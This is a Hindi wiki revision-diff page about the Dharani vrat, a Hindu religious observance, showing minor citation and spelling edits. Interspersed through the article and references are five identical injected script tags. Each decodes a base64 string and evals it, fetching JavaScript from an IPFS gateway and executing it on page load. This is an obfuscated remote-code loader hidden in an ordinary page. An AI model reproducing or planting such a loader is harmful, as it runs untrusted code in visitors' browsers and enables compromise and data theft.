Difference between revisions of "धरणी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[कार्तिक]] [[शुक्ल पक्ष]] की [[एकादशी]] पर आरम्भ होता है।
 
*[[कार्तिक]] [[शुक्ल पक्ष]] की [[एकादशी]] पर आरम्भ होता है।
 
*इस व्रत में नारायण की मूर्ति की पूजा की जाती है।
 
*इस व्रत में नारायण की मूर्ति की पूजा की जाती है।
Line 7: Line 7:
 
*उस रात्रि जागर (जागरण) किरा जाता है।
 
*उस रात्रि जागर (जागरण) किरा जाता है।
 
*दूसरे दिन प्रातः पाँच ब्राह्मण बुलाये जाते हैं, उन्हें भोजन एवं दक्षिणा से सम्मानित किया जाता है।
 
*दूसरे दिन प्रातः पाँच ब्राह्मण बुलाये जाते हैं, उन्हें भोजन एवं दक्षिणा से सम्मानित किया जाता है।
*इस व्रत को प्रजापति, बहुत से प्रसिद्ध राजाओं तथा स्वयं धरती (पृथ्वी) ने किया था, इससे इसका ऐसा नाम पड़ा।<ref>हेमाद्रि (व्रतखण्ड 1, 1041-44, [[वराह पुराण]] 50|1-29 से उद्धरण)</ref>  
+
*इस व्रत को प्रजापति, बहुत से प्रसिद्ध राजाओं तथा स्वयं धरती (पृथ्वी) ने किया था, इससे इसका ऐसा नाम पड़ा।<ref>हेमाद्रि (व्रतखण्ड 1, 1041-44, [[वराह पुराण]] 50|1-29 से उद्धरण</ref>  
*कृत्यरत्नाकर<ref>कृत्यरत्नाकर (426-430)</ref> ने इसे [[योगीश्वर द्वारशी]] कहा है।  
+
*कृत्यरत्नाकर<ref>कृत्यरत्नाकर (426-430</ref> ने इसे [[योगीश्वर द्वारशी]] कहा है।  
 
+
{{प्रचार}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:50, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • kartik shukl paksh ki ekadashi par arambh hota hai.
  • is vrat mean narayan ki moorti ki pooja ki jati hai.
  • moorti ke samaksh char gh de rakhe jate haian, jinamean ratn rakhe jate haian, jinake tamr-dhakkanoan par svarn evan til rakh diye jate haian.
  • ye charoan gh de samudr samajhe jate haian.
  • svarn pratima inake bich mean pratisthapit ki jati hai.
  • us ratri jagar (jagaran) kira jata hai.
  • doosare din pratah paanch brahman bulaye jate haian, unhean bhojan evan dakshina se sammanit kiya jata hai.
  • is vrat ko prajapati, bahut se prasiddh rajaoan tatha svayan dharati (prithvi) ne kiya tha, isase isaka aisa nam p da.[1]
  • krityaratnakar[2] ne ise yogishvar dvarashi kaha hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 1041-44, varah puran 50|1-29 se uddharan
  2. krityaratnakar (426-430

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>